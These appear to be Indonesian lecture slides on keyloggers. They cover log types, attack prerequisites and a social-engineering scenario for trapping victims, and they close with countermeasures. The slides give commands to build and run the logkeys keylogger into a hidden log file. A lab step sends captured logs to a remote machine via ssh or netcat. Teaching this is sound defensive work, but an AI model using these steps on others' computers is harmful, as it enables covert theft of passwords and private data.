Physical and Social Security

● Salah satu anaman terbesar physical dan social security adalah

keylogger.
● Keylogger adalah jenis serangan yang mencatat semua karakter
keyboard yang ditekan (termasuk password dan info penting lainnya)
pada sebuah file log.
● Keylogger bekerja pada komputer lokal, sehingga tidak tergantung
keamanan jaringan apa pun (SSL, https, dll).
● Keylogger ada yang berbentuk software dan hardware.
Tipe log keylogger

1. Local: data disimpan dalam sebuah file log yang

tersimpan di komputer lokal (komputer yang
sama/ditanami keylogger).
2. Remote: data disimpan dalam sebuah file log yang
tersimpan di komputer remote (komputer yang
terpisah namun terhubung via jaringan/internet).
Tahapan serangan keylogger

1. Penyerang harus memiliki akses fisik ke

komputer yang akan ditanam keylogger (baik
software ataupun hardware).
2. Penyerang harus memiliki akses root untuk
menjalankan software keylogger di Linux.
Skenario serangan keylogger

1. Penyerang menanam keylogger di komputer

korban → SULIT: Karena harus punya akses
fisik dan akses root
2. Penyerang menanam keylogger di
komputernya sendiri, kemudian dengan teknik
social engineering menjebak korban agar mau
menggunakan komputer tersebut (buka email,
FB, ssh, dll) → LEBIH MUDAH!
Software keylogger: Logkeys
Logkeys adalah software keylogger berbasis linux. Pertama-tama download
source-nya:
$ wget http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz

Setelah itu extract dan compile:

$ tar zxvf logkeys-0.1.1a.tar.gz
$ cd logkeys-0.1.1a
$ ./configure && make && sudo make install

Untuk menampilkan help → $ sudo logkeys

Menjalankan logkeys dengan keymap US dan log file di ~/.secret.log:

$ sudo logkeys -s -u -o ~/.secret.log

Melihat file log logkeys:

$ sudo cat ~/.secret.log

Menghentikan logkeys:
$ sudo logkeys -k
LAB: Logkeys

● Jalankan logkeys pada komputer sendiri.

● Buka console baru dan ketik sesuatu.
● Lihat apakah terekam pada file log logkeys.
● Buka browser dan login ke Gmail, FB, dll.
● Lihat apakah terekam pada file log logkeys.
● Buka aplikasi word, notepad, dan ketik sesuatu.
● Lihat apakah terekam pada file log logkeys.
● Menggunakan ssh atau netcat, kirim log file ke komputer
remote secara otomatis.
Antisipasi Keylogger

● Perkuat phsical security (cardnetic/fingerprint

access control).
● Perkuat social security agar tidak jadi korban
social engineering (upgrade SDM dan tight
corporate security policy).
● Asumsikan semua komputer asing (warnet,
kampus, dll) tidak bisa dipercaya.